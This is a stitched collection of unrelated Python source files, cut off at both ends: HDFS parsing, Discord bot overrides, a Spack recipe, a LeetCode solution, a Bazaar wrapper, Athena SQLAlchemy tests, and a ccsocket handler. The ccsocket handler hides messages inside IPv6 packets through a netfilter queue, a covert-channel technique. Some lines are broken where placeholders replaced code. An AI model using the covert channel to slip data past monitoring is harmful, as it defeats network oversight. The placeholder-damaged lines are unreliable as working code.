re.UNICODE)\n if m is None:\n return None\n\n rights = m.group(1)\n nbFiles = int(m.group(2))\n owner = m.group(3)\n group = m.group(4)\n size = int(m.group(5))\n\n day = int(m.group(6))\n month = m.group(7)\n try:\n month = strptime(month, \'%b\').tm_mon\n except:\n month = [u""jan"", u""fév"", u""mar"", u""avr"", u""mai"", u""jui"", u""juil"", u""aoû"", u""sep"", u""oct"", u""nov"", u""déc""].index(month) + 1\n\n try:\n year = int(m.group(8))\n except:\n year = datetime.datetime.now().year\n filename = m.group(9)\n\n date = datetime.date(year, month, day)\n\n return FileStatus(filename, rights, nbFiles, owner, group, size, date)\n\n def parse(self, output):\n result = [self.parse_line(line) for line in output.split(""\\n"")]\n return [p for p in result if p is not None]\n\nclass WebHdfsParser(object):\n def __init__(self, path):\n self.path = path\n\n def permissions_to_unix_name(self, is_dir, rights):\n is_dir_prefix = \'d\' if is_dir else \'-\'\n sticky = False\n if len(rights) == 4 and rights[0] == \'1\':\n sticky = True\n rights = rights[1:]\n dic = {\'7\': \'rwx\', \'6\': \'rw-\', \'5\': \'r-x\', \'4\': \'r--\', \'3\': \'-wx\', \'2\': \'-w-\', \'1\': \'--x\', \'0\': \'---\'}\n result = is_dir_prefix + \'\'.join(dic[x] for x in rights)\n if sticky:\n result = result[:-1] + ""t""\n return result\n\n def parse_status(self, status):\n relpath = status[""pathSuffix""]\n path = os.path.join(self.path, relpath)\n nbFiles = 0\n size = status[""length""]\n owner = status[""owner""]\n group = status[""group""]\n is_dir = status[""type""] == ""DIRECTORY""\n right_digits = status[""permission""]\n rights = self.permissions_to_unix_name(is_dir, right_digits)\n\n parsed_date = datetime.datetime.utcfromtimestamp(int(status[""modificationTime""])/1000)\n\n date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)\n\n return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)\n\n\n def parse(self, output):\n\ttry:\n j = json.loads(output)\n\texcept:\n\t print output\t\n\t return []\t\n if ""FileStatuses"" not in j or ""FileStatus"" not in j[""FileStatuses""]:\n print j\n return []\n statuses = j[""FileStatuses""][""FileStatus""]\n result = []\n for status in statuses:\n result.append(self.parse_status(status))\n return result\n', '# coding=utf-8\n""""""Overrides for Discord.py classes""""""\nimport contextlib\nimport inspect\nimport io\nimport itertools\nimport re\n\nimport discord\nfrom discord.ext.commands import HelpFormatter as HelpF, Paginator, Command\nfrom bot.utils import polr, privatebin\n\nfrom bot.utils.args import ArgParseConverter as ArgPC\n\n\ndef create_help(cmd, parser):\n """"""Creates an updated usage for the help command""""""\n default = cmd.params[\'args\'].default\n if cmd.signature.split(""["")[-1] == f""args={default}]"" if default else ""args]"":\n sio = io.StringIO()\n with contextlib.redirect_stdout(sio):\n parser.print_help()\n sio.seek(0)\n s = sio.read()\n # Strip the filename and trailing newline from help text\n arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]\n k = cmd.qualified_name\n spt = len(k.split())\n # Remove a duplicate command name + leading arguments\n split_sig = cmd.signature.split()[spt:]\n return ""["".join(("" "".join(split_sig)).split(""["")[:-1]) + arg_part\n return cmd.usage\n\n\nclass HelpFormatter(HelpF):\n """"""Custom override for the default help command""""""\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._paginator = None\n\n async def format(self):\n """"""Handles the actual behaviour involved with formatting.\n\n To change the behaviour, this method should be overridden.\n\n Returns\n --------\n list\n A paginated output of the help command.\n """"""\n self._paginator = Paginator()\n\n # we need a padding of ~80 or so\n\n description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)\n\n if description:\n # portion\n self._paginator.add_line(description, empty=True)\n\n if isinstance(self.command, Command):\n # \n if self.command.params.get(""args"", None) and type(self.command.params[\'args\'].annotation) == ArgPC:\n self.command.usage = create_help(self.command, self.command.params[\'args\'].annotation.parser)\n signature = self.get_command_signature()\n self._paginator.add_line(signature, empty=True)\n\n # section\n if self.command.help:\n self._paginator.add_line(self.command.help, empty=True)\n\n # end it here if it\'s just a regular command\n if not self.has_subcommands():\n self._paginator.close_page()\n return self._paginator.pages\n\n max_width = self.max_name_size\n\n def category(tup):\n """"""Splits the help command into categories for easier readability""""""\n cog = tup[1].cog_name\n # we insert the zero width space there to give it approximate\n # last place sorting position.\n return cog + \':\' if cog is not None else \'\\u200bNo Category:\'\n\n filtered = await self.filter_command_list()\n if self.is_bot():\n data = sorted(filtered, key=category)\n for category, commands in itertools.groupby(data, key=category):\n # there simply is no prettier way of doing this.\n commands = sorted(commands)\n if len(commands) > 0:\n self._paginator.add_line(category)\n\n self._add_subcommands_to_page(max_width, commands)\n else:\n filtered = sorted(filtered)\n if filtered:\n self._paginator.add_line(\'Commands:\')\n self._add_subcommands_to_page(max_width, filtered)\n\n # add the ending note\n self._paginator.add_line()\n ending_note = self.get_ending_note()\n self._paginator.add_line(ending_note)\n return self._paginator.pages\n\n\n_mentions_transforms = {\n \'@everyone\': \'@\\u200beveryone\',\n \'@here\': \'@\\u200bhere\'\n}\n\n_mention_pattern = re.compile(\'|\'.join(_mentions_transforms.keys()))\n\n\ndef _is_submodule(parent, child):\n return parent == child or child.startswith(parent + ""."")\n\n\nasync def _default_help_command(ctx, *commands: str):\n """"""Shows this message.""""""\n bot = ctx.bot\n destination = ctx.message.author if bot.pm_help else ctx.message.channel\n\n def repl(obj):\n return _mentions_transforms.get(obj.group(0), \'\')\n\n # help by itself just lists our own commands.\n if len(commands) == 0:\n pages = await bot.formatter.format_help_for(ctx, bot)\n elif len(commands) == 1:\n # try to see if it is a cog name\n name = _mention_pattern.sub(repl, commands[0])\n command = None\n if name in bot.cogs:\n command = bot.cogs[name]\n else:\n command = bot.all_commands.get(name)\n if command is None:\n await destination.send(bot.command_not_found.format(name))\n return\n\n pages = await bot.formatter.format_help_for(ctx, command)\n else:\n name = _mention_pattern.sub(repl, commands[0])\n command = bot.all_commands.get(name)\n if command is None:\n await destination.send(bot.command_not_found.format(name))\n return\n\n for key in commands[1:]:\n try:\n key = _mention_pattern.sub(repl, key)\n command = command.all_commands.get(key)\n if command is None:\n await destination.send(bot.command_not_found.format(key))\n return\n except AttributeError:\n await destination.send(bot.command_has_no_subcommands.format(command, key))\n return\n\n pages = await bot.formatter.format_help_for(ctx, command)\n\n if bot.pm_help is None:\n characters = sum(map(len, pages))\n # modify destination based on length of pages.\n if characters > 1000:\n destination = ctx.message.author\n\n for page in pages:\n try:\n await destination.send(page)\n except discord.Forbidden:\n destination = ctx.message.channel\n await destination.send(page)\n\n\nold_send = discord.abc.Messageable.send\n\n\nasync def send(self, content=None, **kwargs):\n """"""Overrides default send method in order to create a paste if the response is more than 2000 characters""""""\n if content is not None and any(x in str(content) for x in [""@everyone"", ""@here""]):\n content = content.replace(""@everyone"", dummy@email.com(""@here"", ""@h\\u0435re"")\n if content is not None and len(str(content)) > 2000:\n if content.startswith(""```py""):\n content = ""\\n"".join(content.split(""\\n"")[1:-1])\n paste = await privatebin.upload(content, expires=""15min"", server=self.bot.priv)\n if self.bot.polr:\n paste = await polr.shorten(paste, **self.bot.polr)\n return await old_send(self, f""Hey, I couldn\'t handle all the text I was gonna send you, so I put it in a paste!""\n f""\\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!"",\n **kwargs)\n else:\n return await old_send(self, content, **kwargs)\n', '##############################################################################\n# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n#\n# This file is part of Spack.\n# Created by Todd Gamblin, dummy@email.com, All rights reserved.\n# LLNL-CODE-647188\n#\n# For details, see https://github.com/llnl/spack\n# Please also see the NOTICE and LICENSE files for our notice and the LGPL.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License (as\n# published by the Free Software Foundation) version 2.1, February 1999.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and\n# conditions of the GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n##############################################################################\nfrom spack import *\n\n\nclass RLimma(RPackage):\n """"""Data analysis, linear models and differential expression\n for microarray data.""""""\n\n homepage = ""https://www.bioconductor.org/packages/limma/""\n url = ""https://git.bioconductor.org/packages/limma""\n list_url = homepage\n\n version(\'3.32.10\', git=\'https://git.bioconductor.org/packages/limma\', commit=\'PI:KEY\')\n version(\'3.32.6\', \'PI:KEY\')\n\n depends_on(dummy@email.com\', dummy@email.com\')\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\'\'\'\n*****************************************\nAuthor: zhlinh\nEmail: dummy@email.com\nVersion: 0.0.1\nCreated Time: 2016-03-11\nLast_modify: 2016-03-11\n******************************************\n\'\'\'\n\n\'\'\'\nGiven a 2D board containing \'X\' and \'O\',\ncapture all regions surrounded by \'X\'.\n\nA region is captured by flipping all \'O\'s\ninto \'X\'s in that surrounded region.\n\nFor example,\nX X X X\nX O O X\nX X O X\nX O X X\nAfter running your function, the board should be:\n\nX X X X\nX X X X\nX X X X\nX O X X\n\'\'\'\n\nclass Solution(object):\n def solve(self, board):\n """"""\n :type board: List[List[str]]\n :rtype: void Do not return anything, modify board in-place instead.\n """"""\n m = len(board)\n if m < 2:\n return\n n = len(board[0])\n for i in range(m):\n self.helper(board, i, 0, m, n)\n if n > 1:\n self.helper(board, i, n - 1, m, n)\n for j in range(n):\n self.helper(board, 0, j, m, n)\n if m > 1:\n self.helper(board, m - 1, j, m, n)\n for i in range(m):\n for j in range(n):\n if board[i][j] == \'O\':\n board[i][j] = \'X\'\n if board[i][j] == \'1\':\n board[i][j] = \'O\'\n\n def helper(self, board, i, j, m, n):\n if board[i][j] == \'O\':\n board[i][j] = \'1\'\n # trick here, normally it could be i >= 1.\n # but the boardary will alays get checked.\n # so i == 1, then check 0 is duplicated.\n if i > 1:\n self.helper(board, i - 1, j, m, n)\n if i < m - 2:\n self.helper(board, i + 1, j, m, n)\n if j > 1:\n self.helper(board, i, j - 1, m, n)\n if j < n - 2:\n self.helper(board, i, j + 1, m, n)\n', ""#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n## This file is part of ccsocket\n## Copyright (C) Tomas Dragoun dummy@email.com\n## This program is published under a GPLv3 license\n########################################################\n\n\nimport nfqueue\nimport sys\nimport signal\nfrom multiprocessing import Process, Pipe, Lock\nfrom socket import AF_INET6\nfrom scapy.all import * \nfrom scapy.layers.inet6 import ICMPv6Unknown\nfrom headers import IPv6ExtHdrAH\nfrom constants import Constants\n\n############################\n## ##\n## NFQHandler ##\n## ##\n############################\n\nclass NFQHandler(Process):\n#---------------------------------------------------------------------------------- \n '''\n This class handles netfilter queue. Is connected with a parent process \n via pipe. Messages are decoded and removed from incoming packets, data \n are send to pipe. In passive mode intercept queue both incoming outgo-\n ing traffic. Inherits multiprocessing.Process\n '''\n#---------------------------------------------------------------------------------- \n def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address): \n ''' Call parent's constructor at first '''\n Process.__init__(self) # init parent (multiprocessing.Process)\n self.name = 'NFQHandler-port ' + str(address[1])\n self.daemon = True # set process daemonic \n ''' Initialize class attributes '''\n self._const = Constants()\n self._encoder = encoder # encodes message in packet\n self._pipe = pipe # exchange data with parent process via pipe\n self._can_send = sendevt # event shared with parent process\n self._stop_send = stopevt # event shared with parent process\n self._proto = proto # upper-layer protocol \n self._active = active # mode\n self._host = address[0]\n self._port = address[1] \n ''' \n Folowing steps prepare netfilter queue with _port as queue \n number. There is always only one active queue associated \n with given number.\n '''\n self._queue = nfqueue.queue() # create queue \n self._queue.open() # open queue\n try:\n self._queue.bind(AF_INET6) # set family type AF_INET6\n except: # fails when any other queue already runs\n pass\n self._queue.set_callback(self.handlepacket) # set queue callback \n '''\n Final step raises RuntimeError in case there is some other \n queue with the same number active, queue wasn't closed \n properly or user's priviledges are insufficient.\n '''\n try:\n self._queue.create_queue(self._port)\n except Exception, e:\n raise e \n#---------------------------------------------------------------------------------- \n def __del__(self):\n if self._pipe: # close connection with parent process\n self._pipe.close()\n#---------------------------------------------------------------------------------- \n def destroyqueue(self):\n ''' Attempts to close queue '''\n if self._queue: \n #print 'stopping queue ' + str(self._port)\n self._queue.close() # close queue\n self._queue = None\n#----------------------------------------------------------------------------------\n def _clear(self):\n ''' Removes all data to send from pipe and sets state to idle '''\n while self._pipe.poll(): # clear pipe\n self._pipe.recv() \n self._can_send.set()\n self._stop_send.clear()\n#---------------------------------------------------------------------------------- \n def run(self):\n ''' \n Runs endless loop. Every time a packet is occurs in queue\n _handlepacket method is called.\n \n '''\n #print 'starting queue ' + str(self._port)\n self._queue.try_run() \n#---------------------------------------------------------------------------------- \n def handlepacket(self, number, payload): \n ''' Queue callback function '''\n packet = IPv6(payload.get_data()) # decode packet from queue as IPv6 \n ''' \n Check if packet belongs to this queue - upperlayer ID field must match \n in active mode. \n ''' \n modify, reroute = self._checkport(packet)\n if not modify:\n ''' \n Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit \n number. Lower 16 bits code this verdict and upper 16 bits \n are used to identify target queue.\n '''\n if reroute != -1:\n error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))\n if not error:\n return\n ''' \n Packet doesn't have icmp echo layer or target port isn't active, \n accept packet \n '''\n payload.set_verdict(nfqueue.NF_ACCEPT) \n return\n ''' \n Port is ok, we need to check if address matches. Ip6tables rules filter\n addresses, but packet might have been rerouted from other queue.\n '''\n if len(self._host): # check source/destination address\n if packet.src != self._host and packet.dst != self._host:\n payload.set_verdict(nfqueue.NF_ACCEPT) \n return\n ''' \n Nfqueue mark is used to distinguish between incoming and outgoing \n packets. Each packet is marked. \n '''\n mark = payload.get_nfmark() # get mark of this packet \n if mark == 1: # incoming packet\n self._incoming(packet, payload)\n elif mark == 2: # outgoing packet\n self._outgoing(packet, payload)\n#---------------------------------------------------------------------------------- \n def _incoming(self, packet, payload): \n message = self._encoder.getmessage(packet) # decode message\n if message is None: # no message \n ''' Accept packet '''\n payload.set_verdict(nfqueue.NF_ACCEPT)\n else:\n ''' Remove message and pass modified packet to queue '''\n modified_packet = self._encoder.removemessage(packet)\n payload.set_verdict_modified(nfqueue.NF_ACCEPT,\n str(modified_packet),\n len(modified_packet))\n try:\n if not len(message):\n return\n except:\n pass\n self._pipe.send((message, (packet.src, self._port, 0, 0))) \n#---------------------------------------------------------------------------------- \n def _outgoing(self, packet, payload):\n if self._stop_send.is_set():\n self._clear()\n if self._pipe.poll(): # any data to send?\n message = self._pipe.recv() # get message\n ''' Encode message and return modified packet to queue '''\n modified_packet = self._encoder.addmessage(message, (packet, None))\n payload.set_verdict_modified(nfqueue.NF_ACCEPT, \n str(modified_packet), \n len(modified_packet))\n if not self._pipe.poll(): # sending finished\n self._can_send.set()\n else: # nothing to send, return packet to queue\n payload.set_verdict(nfqueue.NF_ACCEPT) \n#----------------------------------------------------------------------------------\n def _checkport(self, packet):\n ''' \n Returns tuple (bool, value). True, if packet belongs to this queue. In pa-\n ssive mode always returns True. In active mode upperlayer id field must ma-\n tch current _port number. Value is number of queue where will be packet re-\n routed.\n '''\n ''' Passive mode - override icmp id check '''\n if not self._active:\n return (True, 0)\n \n ''' Active mode - check icmp (or fragment) id field (~ represents port) '''\n if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest\n id = packet[ICMPv6EchoRequest].id \n elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply\n id = packet[ICMPv6EchoReply].id \n elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet\n id = packet[IPv6ExtHdrFragment].id \n elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):\n type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH\n if type != 128 and type != 129:\n return (False, -1) # accept packet\n packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)\n id = packet[ICMPv6EchoRequest].id \n elif self._proto == self._const.PROTO_ALL: # any protocol\n return (True, 0) # id matches port number\n else:\n return (False, -1) # accept packet\n \n if id == self._port:\n return (True, 0) # id matches port number\n else:\n return (False, id) # reroute to correct queue\n#----------------------------------------------------------------------------------\n"", '###############################################################################\n# Name: Cody Precord #\n# Purpose: SourceControl implementation for Bazaar #\n# Author: Cody Precord dummy@email.com #\n# Copyright: (c) 2008 Cody Precord dummy@email.com #\n# License: wxWindows License #\n###############################################################################\n\n""""""Bazaar implementation of the SourceControl object """"""\n\n__author__ = ""Cody Precord dummy@email.com""\n__revision__ = ""$Revision: 867 $""\n__scid__ = ""$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $""\n\n#------------------------------------------------------------------------------#\n# Imports\nimport os\nimport datetime\nimport re\nimport time\n\n# Local imports\nfrom SourceControl import SourceControl, DecodeString\n\n#------------------------------------------------------------------------------#\n\nclass BZR(SourceControl):\n """""" Bazaar source control class """"""\n name = \'Bazaar\'\n command = \'bzr\'\n ccache = list() # Cache of paths that are under bazaar control\n repocache = dict()\n\n def __repr__(self):\n return \'BZR.BZR()\'\n \n def getAuthOptions(self, path):\n """""" Get the repository authentication info """"""\n output = []\n return output\n \n def getRepository(self, path):\n """""" Get the repository of a given path """"""\n if path in self.repocache:\n return self.repocache[path]\n\n if not os.path.isdir(path):\n root = os.path.split(path)[0]\n else:\n root = path\n\n while True:\n if not root:\n break\n\n if os.path.exists(os.path.join(root, \'.bzr\')):\n break\n else:\n root = os.path.split(root)[0]\n\n # Cache the repo of this path for faster lookups next time\n self.repocache[path] = root\n return root\n \n def isControlled(self, path):\n """""" Is the path controlled by BZR? """"""\n t1 = time.time()\n # Check for cached paths to speed up lookup\n if path in self.ccache:\n return True\n\n if not os.path.isdir(path):\n root = os.path.split(path)[0]\n else:\n root = path\n\n last = False\n while True:\n if os.path.exists(os.path.join(root, \'.bzr\')):\n # If a containing directory of the given path has a .bzr\n # directory in it run status to find out if the file is being\n # tracked or not.\n retval = False\n out = self.run(root + os.sep, [\'status\', \'-S\', path])\n if out:\n lines = out.stdout.readline()\n if lines.startswith(\'?\'):\n fname = lines.split(None, 1)[1].strip()\n fname = fname.rstrip(os.sep)\n retval = not path.endswith(fname)\n else:\n retval = True\n self.closeProcess(out)\n\n if retval:\n self.ccache.append(path)\n return retval\n elif last:\n break\n else:\n root, tail = os.path.split(root)\n # If tail is None or \'\' then this has gotten to the root\n # so mark it as the last run\n if not tail:\n last = True\n\n return False\n\n def add(self, paths):\n """""" Add paths to the repository """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'add\'] + files)\n self.logOutput(out)\n self.closeProcess(out)\n \n def checkout(self, paths):\n """""" Checkout files at the given path """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'checkout\',], files)\n self.logOutput(out)\n self.closeProcess(out)\n \n def commit(self, paths, message=\'\'):\n """""" Commit paths to the repository """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'commit\', \'-m\', message] + files)\n self.logOutput(out)\n self.closeProcess(out)\n \n def diff(self, paths):\n """""" Run the diff program on the given files """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'diff\'] + files)\n self.closeProcess(out)\n\n def makePatch(self, paths):\n """""" Make a patch of the given paths """"""\n root, files = self.splitFiles(paths)\n patches = list()\n for fname in files:\n out = self.run(root, [\'diff\', fname])\n lines = [ line for line in out.stdout ]\n self.closeProcess(out)\n patches.append((fname, \'\'.join(lines)))\n return patches\n\n def history(self, paths, history=None):\n """""" Get the revision history of the given paths """"""\n if history is None:\n history = []\n\n root, files = self.splitFiles(paths)\n for fname in files:\n out = self.run(root, [\'log\', fname])\n logstart = False\n if out:\n for line in out.stdout:\n self.log(line)\n if line.strip().startswith(\'-----------\'):\n logstart = False\n current = dict(path=fname, revision=None, \n author=None, date=None, log=u\'\')\n history.append(current)\n elif line.startswith(\'message:\'):\n logstart = True\n elif logstart:\n current[\'log\'] += DecodeString(line)\n elif line.startswith(\'revno:\'):\n current[\'revision\'] = DecodeString(line.split(None, 1)[-1].strip())\n elif line.startswith(\'committer:\'):\n author = line.split(None, 1)[-1]\n current[\'author\'] = DecodeString(author.strip())\n elif line.startswith(\'timestamp:\'):\n date = line.split(None, 1)[-1]\n current[\'date\'] = self.str2datetime(date.strip())\n else:\n pass\n self.logOutput(out)\n self.closeProcess(out)\n return history\n \n def str2datetime(self, tstamp):\n """""" Convert a timestamp string to a datetime object """"""\n parts = tstamp.split()\n ymd = [int(x.strip()) for x in parts[1].split(\'-\')]\n hms = [int(x.strip()) for x in parts[2].split(\':\')]\n date = ymd + hms\n return datetime.datetime(*date)\n \n def remove(self, paths):\n """""" Recursively remove paths from repository """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'remove\', \'--force\'] + files)\n self.logOutput(out)\n \n def status(self, paths, recursive=False, status=dict()):\n """""" Get BZR status information from given file/directory """"""\n codes = {\' \':\'uptodate\', \'N\':\'added\', \'C\':\'conflict\', \'D\':\'deleted\',\n \'M\':\'modified\'}\n root, files = self.splitFiles(paths)\n # -S gives output similar to svn which is a little easier to work with\n out = self.run(root, [\'status\', \'-S\'] + files)\n repo = self.getRepository(paths[0])\n relpath = root.replace(repo, \'\', 1).lstrip(os.sep)\n unknown = list()\n if out:\n for line in out.stdout:\n self.log(line)\n txt = line.lstrip(\' +-\')\n\n # Split the status code and relative file path\n code, fname = txt.split(None, 1)\n fname = fname.replace(u\'/\', os.sep).strip().rstrip(os.sep)\n fname = fname.replace(relpath, \'\', 1).lstrip(os.sep)\n code = code.rstrip(\'*\')\n\n # Skip unknown files\n if code == \'?\':\n unknown.append(fname)\n continue\n\n # Get the absolute file path\n current = dict()\n\n try:\n current[\'status\'] = codes[code]\n status[fname] = current\n except KeyError:\n pass\n\n # Find up to date files\n unknown += status.keys()\n for path in os.listdir(root):\n if path not in unknown:\n status[path] = dict(status=\'uptodate\')\n\n self.logOutput(out)\n return status\n\n def update(self, paths):\n """""" Recursively update paths """"""\n root, files = self.splitFiles(paths)\n out = self.run(root, [\'update\'] + files)\n self.logOutput(out)\n \n def revert(self, paths):\n """""" Recursively revert paths to repository version """"""\n root, files = self.splitFiles(paths)\n if not files:\n files = [\'.\']\n out = self.run(root, [\'revert\'] + files)\n self.logOutput(out)\n\n def fetch(self, paths, rev=None, date=None):\n """""" Fetch a copy of the paths\' contents """"""\n output = []\n for path in paths:\n if os.path.isdir(path):\n continue\n root, files = self.splitFiles(path)\n \n options = []\n if rev:\n options.append(\'-r\')\n options.append(str(rev))\n\n if date:\n # Date format YYYY-MM-DD,HH:MM:SS\n options.append(\'-r\')\n options.append(\'date:%s\' % date)\n \n out = self.run(root, [\'cat\'] + options + files)\n if out:\n output.append(out.stdout.read())\n self.logOutput(out)\n else:\n output.append(None)\n return output\n', '# -*- coding: utf-8 -*-\nimport re\nimport unittest\nimport uuid\nfrom datetime import date, datetime\nfrom decimal import Decimal\nfrom urllib.parse import quote_plus\n\nimport numpy as np\nimport pandas as pd\nimport sqlalchemy\nfrom sqlalchemy import String\nfrom sqlalchemy.engine import create_engine\nfrom sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError\nfrom sqlalchemy.sql import expression\nfrom sqlalchemy.sql.schema import Column, MetaData, Table\nfrom sqlalchemy.sql.sqltypes import (\n BIGINT,\n BINARY,\n BOOLEAN,\n DATE,\n DECIMAL,\n FLOAT,\n INTEGER,\n STRINGTYPE,\n TIMESTAMP,\n)\n\nfrom tests.conftest import ENV, SCHEMA\nfrom tests.util import with_engine\n\n\nclass TestSQLAlchemyAthena(unittest.TestCase):\n """"""Reference test case is following:\n\n https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py\n https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py\n https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py\n """"""\n\n def create_engine(self, **kwargs):\n conn_str = (\n ""awsathena+rest://athena.{region_name}.amazonaws.com:443/""\n + ""{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}""\n + ""&compression=snappy""\n )\n if ""verify"" in kwargs:\n conn_str += ""&verify={verify}""\n if ""duration_seconds"" in kwargs:\n conn_str += ""&duration_seconds={duration_seconds}""\n if ""poll_interval"" in kwargs:\n conn_str += ""&poll_interval={poll_interval}""\n if ""kill_on_interrupt"" in kwargs:\n conn_str += ""&kill_on_interrupt={kill_on_interrupt}""\n return create_engine(\n conn_str.format(\n region_name=ENV.region_name,\n schema_name=SCHEMA,\n s3_staging_dir=quote_plus(ENV.s3_staging_dir),\n s3_dir=quote_plus(ENV.s3_staging_dir),\n **kwargs\n )\n )\n\n @with_engine()\n def test_basic_query(self, engine, conn):\n rows = conn.execute(""SELECT * FROM one_row"").fetchall()\n self.assertEqual(len(rows), 1)\n self.assertEqual(rows[0].number_of_rows, 1)\n self.assertEqual(len(rows[0]), 1)\n\n @with_engine()\n def test_reflect_no_such_table(self, engine, conn):\n self.assertRaises(\n NoSuchTableError,\n lambda: Table(""this_does_not_exist"", MetaData(bind=engine), autoload=True),\n )\n self.assertRaises(\n NoSuchTableError,\n lambda: Table(\n ""this_does_not_exist"",\n MetaData(bind=engine),\n schema=""also_does_not_exist"",\n autoload=True,\n ),\n )\n\n @with_engine()\n def test_reflect_table(self, engine, conn):\n one_row = Table(""one_row"", MetaData(bind=engine), autoload=True)\n self.assertEqual(len(one_row.c), 1)\n self.assertIsNotNone(one_row.c.number_of_rows)\n\n @with_engine()\n def test_reflect_table_with_schema(self, engine, conn):\n one_row = Table(""one_row"", MetaData(bind=engine), schema=SCHEMA, autoload=True)\n self.assertEqual(len(one_row.c), 1)\n self.assertIsNotNone(one_row.c.number_of_rows)\n\n @with_engine()\n def test_reflect_table_include_columns(self, engine, conn):\n one_row_complex = Table(""one_row_complex"", MetaData(bind=engine))\n version = float(\n re.search(r""^([\\d]+\\.[\\d]+)\\..+"", sqlalchemy.__version__).group(1)\n )\n if version <= 1.2:\n engine.dialect.reflecttable(\n conn, one_row_complex, include_columns=[""col_int""], exclude_columns=[]\n )\n elif version == 1.3:\n # https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html\n # #PI:KEY\n engine.dialect.reflecttable(\n conn,\n one_row_complex,\n include_columns=[""col_int""],\n exclude_columns=[],\n resolve_fks=True,\n )\n else: # version >= 1.4\n # https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html\n # #change-0215fae622c01f9409eb1ba2754f4792\n # https://docs.sqlalchemy.org/en/14/core/reflection.html\n # #sqlalchemy.engine.reflection.Inspector.reflect_table\n insp = sqlalchemy.inspect(engine)\n insp.reflect_table(\n one_row_complex,\n include_columns=[""col_int""],\n exclude_columns=[],\n resolve_fks=True,\n )\n self.assertEqual(len(one_row_complex.c), 1)\n self.assertIsNotNone(one_row_complex.c.col_int)\n self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)\n\n @with_engine()\n def test_unicode(self, engine, conn):\n unicode_str = ""密林""\n one_row = Table(""one_row"", MetaData(bind=engine))\n returned_str = sqlalchemy.select(\n [expression.bindparam(""あまぞん"", unicode_str, type_=String())],\n from_obj=one_row,\n ).scalar()\n self.assertEqual(returned_str, unicode_str)\n\n @with_engine()\n def test_reflect_schemas(self, engine, conn):\n insp = sqlalchemy.inspect(engine)\n schemas = insp.get_schema_names()\n self.assertIn(SCHEMA, schemas)\n self.assertIn(""default"", schemas)\n\n @with_engine()\n def test_get_table_names(self, engine, conn):\n meta = MetaData()\n meta.reflect(bind=engine)\n print(meta.tables)\n self.assertIn(""one_row"", meta.tables)\n self.assertIn(""one_row_complex"", meta.tables)\n\n insp = sqlalchemy.inspect(engine)\n self.assertIn(\n ""many_rows"",\n insp.get_table_names(schema=SCHEMA),\n )\n\n @with_engine()\n def test_has_table(self, engine, conn):\n insp = sqlalchemy.inspect(engine)\n self.assertTrue(insp.has_table(""one_row"", schema=SCHEMA))\n self.assertFalse(insp.has_table(""this_table_does_not_exist"", schema=SCHEMA))\n\n @with_engine()\n def test_get_columns(self, engine, conn):\n insp = sqlalchemy.inspect(engine)\n actual = insp.get_columns(table_name=""one_row"", schema=SCHEMA)[0]\n self.assertEqual(actual[""name""], ""number_of_rows"")\n self.assertTrue(isinstance(actual[""type""], INTEGER))\n self.assertTrue(actual[""nullable""])\n self.assertIsNone(actual[""default""])\n self.assertEqual(actual[""ordinal_position""], 1)\n self.assertIsNone(actual[""comment""])\n\n @with_engine()\n def test_char_length(self, engine, conn):\n one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)\n result = (\n sqlalchemy.select(\n [sqlalchemy.func.char_length(one_row_complex.c.col_string)]\n )\n .execute()\n .scalar()\n )\n self.assertEqual(result, len(""a string""))\n\n @with_engine()\n def test_reflect_select(self, engine, conn):\n one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)\n self.assertEqual(len(one_row_complex.c), 15)\n self.assertIsInstance(one_row_complex.c.col_string, Column)\n rows = one_row_complex.select().execute().fetchall()\n self.assertEqual(len(rows), 1)\n self.assertEqual(\n list(rows[0]),\n [\n True,\n 127,\n 32767,\n 2147483647,\n 9223372036854775807,\n 0.5,\n 0.25,\n ""a string"",\n datetime(2017, 1, 1, 0, 0, 0),\n date(2017, 1, 2),\n b""123"",\n ""[1, 2]"",\n ""{1=2, 3=4}"",\n ""{a=1, b=2}"",\n Decimal(""0.1""),\n ],\n )\n self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)\n 